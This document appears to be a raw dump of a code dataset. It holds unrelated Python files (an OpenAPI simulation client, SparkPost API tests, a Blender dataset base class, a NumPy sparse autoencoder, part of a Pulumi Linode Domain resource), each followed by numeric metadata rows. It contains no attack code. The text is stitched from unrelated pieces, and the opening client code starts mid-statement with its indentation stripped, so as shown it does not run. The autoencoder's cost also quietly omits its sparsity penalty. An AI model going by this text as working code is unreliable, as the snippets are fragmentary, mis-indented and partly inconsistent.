local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `simulations_clone`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/v3-beta/simulations/{id}/clone/', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Simulation', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
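    # Hedged usage sketch (comments only). Cloning yields a new, runnable
    # Simulation that copies only the source's events & initials:
    #
    #   cloned = api.simulations_clone(simulation_id)
    #   print(cloned.id)  # id of the new simulation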
def simulations_from_template(self, data, **kwargs): # noqa: E501
"""Create a (new/cloned) simulation from a simulation template. # noqa: E501
There are two options to specify the desired duration for the new simulation: either the ``end_datetime`` **or** the ``duration`` parameter.

{
    "template":        # source simulation template resource id
    "name":            # name for the new simulation
    "tags":            # extra tags, added to the existing simulation template tags
    "organisation":    # uuid of the organisation for which the simulation is run
    "start_datetime":  # datetime (ISO 8601, UTC) for the simulation start, e.g. "YYYY-MM-DDThh:mm:ss"
    "end_datetime":    # datetime (ISO 8601, UTC) for the simulation end, e.g. "YYYY-MM-DDThh:mm:ss"
    "duration":        # in seconds, can be used instead of end_datetime
    "clone_events":    # if true, clone events like rain/sources & sinks etc.
    "clone_initials":  # if true, clone initial waterlevels
    "clone_settings":  # if true, clone simulation settings, like physical settings etc.
}  # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.simulations_from_template(data, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param FromTemplate data: (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: Simulation
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.simulations_from_template_with_http_info(data, **kwargs) # noqa: E501
def simulations_from_template_with_http_info(self, data, **kwargs): # noqa: E501
"""Create a (new/cloned) simulation from a simulation template. # noqa: E501
There are two options to specify the desired duration for the new simulation: either the ``end_datetime`` **or** the ``duration`` parameter.

{
    "template":        # source simulation template resource id
    "name":            # name for the new simulation
    "tags":            # extra tags, added to the existing simulation template tags
    "organisation":    # uuid of the organisation for which the simulation is run
    "start_datetime":  # datetime (ISO 8601, UTC) for the simulation start, e.g. "YYYY-MM-DDThh:mm:ss"
    "end_datetime":    # datetime (ISO 8601, UTC) for the simulation end, e.g. "YYYY-MM-DDThh:mm:ss"
    "duration":        # in seconds, can be used instead of end_datetime
    "clone_events":    # if true, clone events like rain/sources & sinks etc.
    "clone_initials":  # if true, clone initial waterlevels
    "clone_settings":  # if true, clone simulation settings, like physical settings etc.
}  # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.simulations_from_template_with_http_info(data, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param FromTemplate data: (required)
:param _return_http_data_only: return the response data only, without
                                status code and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(Simulation, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'data'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method simulations_from_template" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'data' is set
if self.api_client.client_side_validation and ('data' not in local_var_params or # noqa: E501
local_var_params['data'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `data` when calling `simulations_from_template`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'data' in local_var_params:
body_params = local_var_params['data']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/v3-beta/simulations/from_template/', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Simulation', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
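    # Hedged usage sketch for the payload documented above. Field names
    # follow the docstring; the FromTemplate model's import path and the
    # placeholder values are assumptions:
    #
    #   data = FromTemplate(
    #       template=123,                     # source template id (placeholder)
    #       name="rerun of rain scenario",
    #       organisation="<organisation uuid>",
    #       start_datetime="2021-01-01T00:00:00",
    #       duration=3600,                    # seconds, instead of end_datetime
    #       clone_events=True,
    #       clone_initials=True,
    #       clone_settings=True,
    #   )
    #   simulation = api.simulations_from_template(data)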
| 54.070514
| 1,186
| 0.632819
| 36,036
| 316,691
| 5.199134
| 0.011544
| 0.057217
| 0.094451
| 0.03322
| 0.976857
| 0.965403
| 0.948478
| 0.932919
| 0.927069
| 0.915834
| 0
| 0.016686
| 0.293179
| 316,691
| 5,856
| 1,187
| 54.079747
| 0.820308
| 0.397649
| 0
| 0.685514
| 0
| 0
| 0.266465
| 0.123453
| 0
| 0
| 0
| 0
| 0
| 1
| 0.025761
| false
| 0
| 0.001673
| 0
| 0.053195
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
f171d27ba3c224d6b008c063fa275e2b5abe8eeb
| 102
|
py
|
Python
|
build.py
|
Nepmia/N4-Framework
|
84d98f3fe05ca02f938332e5970bca5482ef8ce7
|
[
"MIT"
] | null | null | null |
build.py
|
Nepmia/N4-Framework
|
84d98f3fe05ca02f938332e5970bca5482ef8ce7
|
[
"MIT"
] | null | null | null |
build.py
|
Nepmia/N4-Framework
|
84d98f3fe05ca02f938332e5970bca5482ef8ce7
|
[
"MIT"
] | null | null | null |
from template_handler import template_builder, templates_lister
# Discover all available templates and build each of them.
template_builder(templates_lister())
| 25.5
| 63
| 0.882353
| 12
| 102
| 7.083333
| 0.583333
| 0.352941
| 0.564706
| 0.705882
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.068627
| 102
| 4
| 64
| 25.5
| 0.894737
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 0.5
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
f174753cba9198ba54b664cbc54c27b45c67aedf
| 1,699
|
py
|
Python
|
test/test_events.py
|
klevio/python-sparkpost
|
007fb26ff5d046a639a88273265fd0775573a8e2
|
[
"Apache-2.0"
] | null | null | null |
test/test_events.py
|
klevio/python-sparkpost
|
007fb26ff5d046a639a88273265fd0775573a8e2
|
[
"Apache-2.0"
] | null | null | null |
test/test_events.py
|
klevio/python-sparkpost
|
007fb26ff5d046a639a88273265fd0775573a8e2
|
[
"Apache-2.0"
] | null | null | null |
import pytest
import responses
from sparkpost import SparkPost
from sparkpost.exceptions import SparkPostAPIException
@responses.activate
def test_success_events_message():
responses.add(
responses.GET,
'https://api.sparkpost.com/api/v1/events/message',
status=200,
content_type='application/json',
body='{"results": []}'
)
sp = SparkPost('fake-key')
results = sp.events.message.list()
assert results == []
@responses.activate
def test_fail_events_message():
responses.add(
responses.GET,
'https://api.sparkpost.com/api/v1/events/message',
status=500,
content_type='application/json',
body="""
{"errors": [{"message": "You failed", "description": "More Info"}]}
"""
)
with pytest.raises(SparkPostAPIException):
sp = SparkPost('fake-key')
sp.events.message.list()
@responses.activate
def test_success_events_ingest():
responses.add(
responses.GET,
'https://api.sparkpost.com/api/v1/events/ingest',
status=200,
content_type='application/json',
body='{"results": []}'
)
sp = SparkPost('fake-key')
results = sp.events.ingest.list()
assert results == []
@responses.activate
def test_fail_events_ingest():
responses.add(
responses.GET,
'https://api.sparkpost.com/api/v1/events/ingest',
status=500,
content_type='application/json',
body="""
{"errors": [{"message": "You failed", "description": "More Info"}]}
"""
)
with pytest.raises(SparkPostAPIException):
sp = SparkPost('fake-key')
sp.events.ingest.list()
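# The four tests above share one shape. A hedged sketch of equivalent
# success-path coverage via pytest.mark.parametrize (relies on this module's
# existing imports; an alternative, not part of the original suite):
@pytest.mark.parametrize('endpoint', ['message', 'ingest'])
@responses.activate
def test_success_events_parametrized(endpoint):
    responses.add(
        responses.GET,
        'https://api.sparkpost.com/api/v1/events/%s' % endpoint,
        status=200,
        content_type='application/json',
        body='{"results": []}'
    )
    sp = SparkPost('fake-key')
    # sp.events.message / sp.events.ingest, selected dynamically.
    assert getattr(sp.events, endpoint).list() == []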
| 25.742424
| 75
| 0.616245
| 179
| 1,699
| 5.759777
| 0.240223
| 0.075655
| 0.077595
| 0.093113
| 0.865179
| 0.865179
| 0.805044
| 0.805044
| 0.805044
| 0.71775
| 0
| 0.012308
| 0.234844
| 1,699
| 65
| 76
| 26.138462
| 0.780769
| 0
| 0
| 0.714286
| 0
| 0
| 0.283696
| 0
| 0
| 0
| 0
| 0
| 0.035714
| 1
| 0.071429
| false
| 0
| 0.071429
| 0
| 0.142857
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
74cf486be57b08845c988fa34b7e4ba6f1addeac
| 2,024
|
py
|
Python
|
render/dataset.py
|
VCL3D/BlenderScripts
|
d9671801d2a7686226c9fcf297d89a4388158733
|
[
"MIT"
] | 11
|
2021-05-11T17:26:59.000Z
|
2022-03-25T08:13:59.000Z
|
render/dataset.py
|
VCL3D/BlenderScripts
|
d9671801d2a7686226c9fcf297d89a4388158733
|
[
"MIT"
] | null | null | null |
render/dataset.py
|
VCL3D/BlenderScripts
|
d9671801d2a7686226c9fcf297d89a4388158733
|
[
"MIT"
] | 2
|
2021-05-15T01:56:01.000Z
|
2021-05-15T13:49:57.000Z
|
class Dataset(object):
def __init__(self, name=None):
self.name = name
def __str__(self):
return self.name
def get_instance_name(self, filepath, id):
raise NotImplementedError("Abstract class")
def import_model(self, filepath):
raise NotImplementedError("Abstract class")
def get_camera_position(self, filepath):
raise NotImplementedError("Abstract class")
def get_camera_position_generator(self, folder):
raise NotImplementedError("Abstract class")
    def get_camera_rotation(self, degrees=0):
raise NotImplementedError("Abstract class")
def get_camera_offset(self, direction, distance, degrees):
raise NotImplementedError("Abstract class")
def get_depth_output(self, output_path, base_filename, nodes, links, compositor):
raise NotImplementedError("Abstract class")
def get_color_output(self, output_path, base_filename, nodes, links, compositor):
raise NotImplementedError("Abstract class")
def get_emission_output(self, output_path, base_filename, nodes, links, compositor):
raise NotImplementedError("Abstract class")
def get_normals_output(self, output_path, base_filename, nodes, links, compositor):
raise NotImplementedError("Abstract class")
def get_normal_map_output(self, output_path, base_filename, nodes, links, compositor):
raise NotImplementedError("Abstract class")
def get_flow_map_output(self, output_path, base_filename, nodes, links, compositor):
raise NotImplementedError("Abstract class")
def get_semantic_map_output(self, labels_path, output_path, base_filename, nodes, links, compositor):
raise NotImplementedError("Abstract class")
def get_pretty_semantic_map_output(self, labels_path, output_path, base_filename, nodes, links, compositor):
raise NotImplementedError("Abstract class")
def set_render_settings(self):
raise NotImplementedError("Abstract class")
| 36.142857
| 112
| 0.727767
| 227
| 2,024
| 6.220264
| 0.215859
| 0.254958
| 0.339943
| 0.393059
| 0.796034
| 0.767705
| 0.737252
| 0.667847
| 0.667847
| 0.667847
| 0
| 0.000608
| 0.187747
| 2,024
| 56
| 113
| 36.142857
| 0.858273
| 0
| 0
| 0.428571
| 0
| 0
| 0.103704
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.485714
| false
| 0
| 0.028571
| 0.028571
| 0.571429
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 8
|
74ff594067bdd8576d190e8ee173e971d106f8d2
| 151
|
py
|
Python
|
src/test_only_plugins/heroku/__init__.py
|
FelixSchwarz/sentry
|
7c92c4fa2b6b9f214764f48c82594acae1549e52
|
[
"BSD-3-Clause"
] | null | null | null |
src/test_only_plugins/heroku/__init__.py
|
FelixSchwarz/sentry
|
7c92c4fa2b6b9f214764f48c82594acae1549e52
|
[
"BSD-3-Clause"
] | null | null | null |
src/test_only_plugins/heroku/__init__.py
|
FelixSchwarz/sentry
|
7c92c4fa2b6b9f214764f48c82594acae1549e52
|
[
"BSD-3-Clause"
] | null | null | null |
from __future__ import absolute_import
from test_only_plugins.base import assert_package_not_installed
assert_package_not_installed("sentry-heroku")
| 25.166667
| 63
| 0.887417
| 21
| 151
| 5.761905
| 0.666667
| 0.214876
| 0.264463
| 0.413223
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.072848
| 151
| 5
| 64
| 30.2
| 0.864286
| 0
| 0
| 0
| 0
| 0
| 0.086093
| 0
| 0
| 0
| 0
| 0
| 0.666667
| 1
| 0
| true
| 0
| 0.666667
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 9
|
7453a9a6d1aed9afe01f4c3b0e9f32ef46080879
| 4,175
|
py
|
Python
|
src/sparse_autoencoder.py
|
jihunhamm/MinimaxFilter
|
fa9ee7aa126cbf651c4c9cbf076e4ba848fcfc46
|
[
"Apache-2.0"
] | 10
|
2017-05-25T20:14:26.000Z
|
2019-07-08T12:20:17.000Z
|
src/sparse_autoencoder.py
|
jihunhamm/MinimaxFilter
|
fa9ee7aa126cbf651c4c9cbf076e4ba848fcfc46
|
[
"Apache-2.0"
] | null | null | null |
src/sparse_autoencoder.py
|
jihunhamm/MinimaxFilter
|
fa9ee7aa126cbf651c4c9cbf076e4ba848fcfc46
|
[
"Apache-2.0"
] | 7
|
2016-12-29T16:57:20.000Z
|
2020-01-19T00:59:23.000Z
|
import numpy as np
def sigmoid(x):
    # Numerically stable logistic: use 1/(1+exp(-x)) for x >= 0 and
    # exp(x)/(1+exp(x)) for x < 0, avoiding overflow in np.exp.
    indp = np.where(x>=0)
    indn = np.where(x<0)
    tx = np.zeros(x.shape)
    tx[indp] = 1./(1.+np.exp(-x[indp]))
    tx[indn] = np.exp(x[indn])/(1.+np.exp(x[indn]))
    return tx
def sigmoid_prime(x):
    return sigmoid(x) * (1 - sigmoid(x))
def KL_divergence(x, y):
    # Elementwise KL divergence between Bernoulli(x) and Bernoulli(y);
    # the 1E-20 terms guard against log(0).
    return x * (np.log(x+1E-20)-np.log(y+1E-20)) + (1 - x) * (np.log(1 - x+1E-20) - np.log(1 - y+1E-20))
def initialize(hidden_size, visible_size):
r = np.sqrt(6) / np.sqrt(hidden_size + visible_size + 1)
W1 = np.random.random((hidden_size, visible_size)) * 2 * r - r
W2 = np.random.random((visible_size, hidden_size)) * 2 * r - r
b1 = np.zeros(hidden_size, dtype=np.float64)
b2 = np.zeros(visible_size, dtype=np.float64)
theta = np.concatenate((W1.reshape(hidden_size * visible_size),
W2.reshape(hidden_size * visible_size),
b1.reshape(hidden_size),
b2.reshape(visible_size)))
return theta
def sparse_autoencoder_cost(theta, visible_size, hidden_size,
lambda_, sparsity_param, beta, data):
W1 = theta[0:hidden_size * visible_size].reshape(hidden_size, visible_size)
W2 = theta[hidden_size * visible_size:2 * hidden_size * visible_size].reshape(visible_size, hidden_size)
b1 = theta[2 * hidden_size * visible_size:2 * hidden_size * visible_size + hidden_size]
b2 = theta[2 * hidden_size * visible_size + hidden_size:]
m = data.shape[1]
z2 = W1.dot(data) + np.tile(b1, (m, 1)).transpose()
a2 = sigmoid(z2)
z3 = W2.dot(a2) + np.tile(b2, (m, 1)).transpose()
h = sigmoid(z3)
    cost = np.sum((h - data) ** 2) / (2 * m) + \
        (lambda_ / 2) * (np.sum(W1 ** 2) + np.sum(W2 ** 2))
    # NOTE: the beta * KL_divergence(sparsity_param, rho_hat) sparsity
    # penalty has been dropped here; sparsity_delta stays 0 accordingly.
    sparsity_delta = 0
delta3 = -(data - h) * sigmoid_prime(z3)
delta2 = (W2.transpose().dot(delta3) + beta * sparsity_delta) * sigmoid_prime(z2)
W1grad = delta2.dot(data.transpose()) / m + lambda_ * W1
W2grad = delta3.dot(a2.transpose()) / m + lambda_ * W2
b1grad = np.sum(delta2, axis=1) / m
b2grad = np.sum(delta3, axis=1) / m
grad = np.concatenate((W1grad.reshape(hidden_size * visible_size),
W2grad.reshape(hidden_size * visible_size),
b1grad.reshape(hidden_size),
b2grad.reshape(visible_size)))
return cost, grad
def sparse_autoencoder(theta, hidden_size, visible_size, data):
W1 = theta[0:hidden_size * visible_size].reshape(hidden_size, visible_size)
b1 = theta[2 * hidden_size * visible_size:2 * hidden_size * visible_size + hidden_size]
m = data.shape[1]
z2 = W1.dot(data) + np.tile(b1, (m, 1)).transpose()
a2 = sigmoid(z2)
return a2
def sparse_autoencoder_linear_cost(theta, visible_size, hidden_size,
lambda_, sparsity_param, beta, data):
W1 = theta[0:hidden_size * visible_size].reshape(hidden_size, visible_size)
W2 = theta[hidden_size * visible_size:2 * hidden_size * visible_size].reshape(visible_size, hidden_size)
b1 = theta[2 * hidden_size * visible_size:2 * hidden_size * visible_size + hidden_size]
b2 = theta[2 * hidden_size * visible_size + hidden_size:]
m = data.shape[1]
z2 = W1.dot(data) + np.tile(b1, (m, 1)).transpose()
a2 = sigmoid(z2)
z3 = W2.dot(a2) + np.tile(b2, (m, 1)).transpose()
h = z3
cost = np.sum((h - data) ** 2) / (2 * m) + \
(lambda_ / 2) * (np.sum(W1 ** 2) + np.sum(W2 ** 2))
sparsity_delta = 0.
delta3 = -(data - h)
delta2 = (W2.transpose().dot(delta3) + beta * sparsity_delta) * sigmoid_prime(z2)
W1grad = delta2.dot(data.transpose()) / m + lambda_ * W1
W2grad = delta3.dot(a2.transpose()) / m + lambda_ * W2
b1grad = np.sum(delta2, axis=1) / m
b2grad = np.sum(delta3, axis=1) / m
grad = np.concatenate((W1grad.reshape(hidden_size * visible_size),
W2grad.reshape(hidden_size * visible_size),
b1grad.reshape(hidden_size),
b2grad.reshape(visible_size)))
return cost, grad
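# Hedged end-to-end sketch: fit the autoencoder on random data with L-BFGS.
# scipy is an assumption here (this module does not import it), and the
# hyperparameters are placeholders:
if __name__ == '__main__':
    import scipy.optimize
    visible_size, hidden_size = 64, 25
    data = np.random.random((visible_size, 100))  # columns are samples
    theta0 = initialize(hidden_size, visible_size)
    # sparse_autoencoder_cost returns (cost, grad), so jac=True works here.
    result = scipy.optimize.minimize(
        sparse_autoencoder_cost, theta0, jac=True, method='L-BFGS-B',
        args=(visible_size, hidden_size, 3e-3, 0.1, 3.0, data),
        options={'maxiter': 100})
    features = sparse_autoencoder(result.x, hidden_size, visible_size, data)
    print(features.shape)  # -> (hidden_size, 100)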
| 34.504132
| 108
| 0.597126
| 593
| 4,175
| 4.028668
| 0.116358
| 0.175806
| 0.199247
| 0.246128
| 0.763499
| 0.735036
| 0.70992
| 0.70992
| 0.70992
| 0.70992
| 0
| 0.049871
| 0.255569
| 4,175
| 120
| 109
| 34.791667
| 0.71879
| 0.000719
| 0
| 0.5875
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.0875
| false
| 0
| 0.0125
| 0.025
| 0.1875
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
745b13c98a95ca002fe9fae1e0e136c01d2110e0
| 41,127
|
py
|
Python
|
sdk/python/pulumi_linode/domain.py
|
pulumi/pulumi-linode
|
dcdc078ddcad836dddf6f31879f0f0488bec33b4
|
[
"ECL-2.0",
"Apache-2.0"
] | 18
|
2019-05-02T21:14:37.000Z
|
2021-12-19T18:37:40.000Z
|
sdk/python/pulumi_linode/domain.py
|
pulumi/pulumi-linode
|
dcdc078ddcad836dddf6f31879f0f0488bec33b4
|
[
"ECL-2.0",
"Apache-2.0"
] | 79
|
2019-05-01T17:52:03.000Z
|
2022-03-31T15:31:56.000Z
|
sdk/python/pulumi_linode/domain.py
|
pulumi/pulumi-linode
|
dcdc078ddcad836dddf6f31879f0f0488bec33b4
|
[
"ECL-2.0",
"Apache-2.0"
] | 6
|
2019-05-02T00:37:23.000Z
|
2021-05-04T11:10:40.000Z
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from . import _utilities
__all__ = ['DomainArgs', 'Domain']
@pulumi.input_type
class DomainArgs:
def __init__(__self__, *,
domain: pulumi.Input[str],
type: pulumi.Input[str],
axfr_ips: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
description: Optional[pulumi.Input[str]] = None,
expire_sec: Optional[pulumi.Input[int]] = None,
group: Optional[pulumi.Input[str]] = None,
master_ips: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
refresh_sec: Optional[pulumi.Input[int]] = None,
retry_sec: Optional[pulumi.Input[int]] = None,
soa_email: Optional[pulumi.Input[str]] = None,
status: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
ttl_sec: Optional[pulumi.Input[int]] = None):
"""
The set of arguments for constructing a Domain resource.
:param pulumi.Input[str] domain: The domain this Domain represents. These must be unique in our system; you cannot have two Domains representing the same domain.
:param pulumi.Input[str] type: If this Domain represents the authoritative source of information for the domain it describes, or if it is a read-only copy of a master (also called a slave).
:param pulumi.Input[Sequence[pulumi.Input[str]]] axfr_ips: The list of IPs that may perform a zone transfer for this Domain. This is potentially dangerous, and should be set to an empty list unless you intend to use it.
:param pulumi.Input[str] description: A description for this Domain. This is for display purposes only.
:param pulumi.Input[int] expire_sec: The amount of time in seconds that may pass before this Domain is no longer authoritative. Valid values are 300, 3600, 7200, 14400, 28800, 57600, 86400, 172800, 345600, 604800, 1209600, and 2419200 - any other value will be rounded to the nearest valid value.
:param pulumi.Input[str] group: The group this Domain belongs to. This is for display purposes only.
:param pulumi.Input[Sequence[pulumi.Input[str]]] master_ips: The IP addresses representing the master DNS for this Domain.
:param pulumi.Input[int] refresh_sec: The amount of time in seconds before this Domain should be refreshed. Valid values are 300, 3600, 7200, 14400, 28800, 57600, 86400, 172800, 345600, 604800, 1209600, and 2419200 - any other value will be rounded to the nearest valid value.
:param pulumi.Input[int] retry_sec: The interval, in seconds, at which a failed refresh should be retried. Valid values are 300, 3600, 7200, 14400, 28800, 57600, 86400, 172800, 345600, 604800, 1209600, and 2419200 - any other value will be rounded to the nearest valid value.
:param pulumi.Input[str] soa_email: Start of Authority email address. This is required for master Domains.
:param pulumi.Input[str] status: Used to control whether this Domain is currently being rendered (defaults to "active").
:param pulumi.Input[Sequence[pulumi.Input[str]]] tags: A list of tags applied to this object. Tags are for organizational purposes only.
:param pulumi.Input[int] ttl_sec: 'Time to Live' - the amount of time in seconds that this Domain's records may be cached by resolvers or other domain servers. Valid values are 300, 3600, 7200, 14400, 28800, 57600, 86400, 172800, 345600, 604800, 1209600, and 2419200 - any other value will be rounded to the nearest valid value.
"""
pulumi.set(__self__, "domain", domain)
pulumi.set(__self__, "type", type)
if axfr_ips is not None:
pulumi.set(__self__, "axfr_ips", axfr_ips)
if description is not None:
pulumi.set(__self__, "description", description)
if expire_sec is not None:
pulumi.set(__self__, "expire_sec", expire_sec)
if group is not None:
pulumi.set(__self__, "group", group)
if master_ips is not None:
pulumi.set(__self__, "master_ips", master_ips)
if refresh_sec is not None:
pulumi.set(__self__, "refresh_sec", refresh_sec)
if retry_sec is not None:
pulumi.set(__self__, "retry_sec", retry_sec)
if soa_email is not None:
pulumi.set(__self__, "soa_email", soa_email)
if status is not None:
pulumi.set(__self__, "status", status)
if tags is not None:
pulumi.set(__self__, "tags", tags)
if ttl_sec is not None:
pulumi.set(__self__, "ttl_sec", ttl_sec)
@property
@pulumi.getter
def domain(self) -> pulumi.Input[str]:
"""
The domain this Domain represents. These must be unique in our system; you cannot have two Domains representing the same domain.
"""
return pulumi.get(self, "domain")
@domain.setter
def domain(self, value: pulumi.Input[str]):
pulumi.set(self, "domain", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
If this Domain represents the authoritative source of information for the domain it describes, or if it is a read-only copy of a master (also called a slave).
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter(name="axfrIps")
def axfr_ips(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
The list of IPs that may perform a zone transfer for this Domain. This is potentially dangerous, and should be set to an empty list unless you intend to use it.
"""
return pulumi.get(self, "axfr_ips")
@axfr_ips.setter
def axfr_ips(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "axfr_ips", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
A description for this Domain. This is for display purposes only.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="expireSec")
def expire_sec(self) -> Optional[pulumi.Input[int]]:
"""
The amount of time in seconds that may pass before this Domain is no longer authoritative. Valid values are 300, 3600, 7200, 14400, 28800, 57600, 86400, 172800, 345600, 604800, 1209600, and 2419200 - any other value will be rounded to the nearest valid value.
"""
return pulumi.get(self, "expire_sec")
@expire_sec.setter
def expire_sec(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "expire_sec", value)
@property
@pulumi.getter
def group(self) -> Optional[pulumi.Input[str]]:
"""
The group this Domain belongs to. This is for display purposes only.
"""
return pulumi.get(self, "group")
@group.setter
def group(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "group", value)
@property
@pulumi.getter(name="masterIps")
def master_ips(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
The IP addresses representing the master DNS for this Domain.
"""
return pulumi.get(self, "master_ips")
@master_ips.setter
def master_ips(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "master_ips", value)
@property
@pulumi.getter(name="refreshSec")
def refresh_sec(self) -> Optional[pulumi.Input[int]]:
"""
The amount of time in seconds before this Domain should be refreshed. Valid values are 300, 3600, 7200, 14400, 28800, 57600, 86400, 172800, 345600, 604800, 1209600, and 2419200 - any other value will be rounded to the nearest valid value.
"""
return pulumi.get(self, "refresh_sec")
@refresh_sec.setter
def refresh_sec(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "refresh_sec", value)
@property
@pulumi.getter(name="retrySec")
def retry_sec(self) -> Optional[pulumi.Input[int]]:
"""
The interval, in seconds, at which a failed refresh should be retried. Valid values are 300, 3600, 7200, 14400, 28800, 57600, 86400, 172800, 345600, 604800, 1209600, and 2419200 - any other value will be rounded to the nearest valid value.
"""
return pulumi.get(self, "retry_sec")
@retry_sec.setter
def retry_sec(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "retry_sec", value)
@property
@pulumi.getter(name="soaEmail")
def soa_email(self) -> Optional[pulumi.Input[str]]:
"""
Start of Authority email address. This is required for master Domains.
"""
return pulumi.get(self, "soa_email")
@soa_email.setter
